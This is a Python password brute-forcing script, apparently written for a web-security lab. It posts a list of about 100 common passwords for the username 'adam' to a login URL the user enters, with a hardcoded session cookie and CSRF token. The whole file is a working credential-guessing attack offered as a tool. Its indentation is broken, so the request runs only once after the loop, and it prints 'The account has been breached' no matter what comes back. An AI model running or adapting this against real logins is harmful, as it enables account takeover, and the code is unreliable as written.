import requests
import time

license = """
    PyTruder  Copyright (C) 2020  Owen000
    This program comes with ABSOLUTELY NO WARRANTY
    This is free software, and you are welcome to redistribute it.
"""
print(license)

with open('./asciiart.txt', 'r') as f:
  print(f.read())

url = input("Enter URL:")

dict = ['123456', 'password', '12345678', 'qwerty', '123456789', '12345', '1234', '111111', '1234567', 'dragon', '123123', 'baseball', 'abc123', 'football', 'monkey', 'letmein', 'shadow', 'master', '666666', 'qwertyuiop', '123321', 'mustang', '1234567890', 'michael', '654321', 'superman', '1qaz2wsx', '7777777', '121212', '000000', 'qazwsx', '123qwe', 'killer', 'trustno1', 'jordan', 'jennifer', 'zxcvbnm', 'asdfgh', 'hunter', 'buster', 'soccer', 'harley', 'batman', 'andrew', 'tigger', 'sunshine', 'iloveyou', '2000', 'charlie', 'robert', 'thomas', 'hockey', 'ranger', 'daniel', 'starwars', 'klaster', '112233', 'george', 'computer', 'michelle', 'jessica', 'pepper', '1111', 'zxcvbn', '555555', '11111111', '131313', 'freedom', '777777', 'pass', 'maggie', '159753', 'aaaaaa', 'ginger', 'princess', 'joshua', 'cheese', 'amanda', 'summer', 'love', 'ashley', 'nicole', 'chelsea', 'biteme', 'matthew', 'access', 'yankees', '987654321', 'dallas', 'austin', 'thunder', 'taylor', 'matrix', 'mobilemail', 'mom', 'monitor', 'monitoring', 'montana', 'moon', 'moscow']
cookies = {
  'session': 'OtE0Ix6kNOo62rEx0tT2J28jBKhzFuFo'
}

for password in dict:
  payload = {
    'username': 'adam',
    'password': password,
    'csrf': '2FOEVOwUB6nMJ8toAUmWAxJpJRJ3pawi'
  }
r = requests.post(url, data = payload, cookies = cookies)
if (r.text.find('You have made too many incorrect login attempts') != -1):
  print("Account Locked out")
print("Waiting 60 seconds...")
time.sleep(60)
if (r.text.find('Invalid username or password.') != -1):
  print('Incorrect password ' + password)
if (r.text.find('You have made too many incorrect login attempts') == -1) and(r.text.find('Invalid username or password.') == -1):
  print("___________________________")
print("...........................")
print("The account has been breached")
print("Username: adam")
print("Password: " + password)
print("...........................")
print("___________________________")
printcheck = input("Would you like to see the full request?\n")
if printcheck == "y":
  print(r.text)
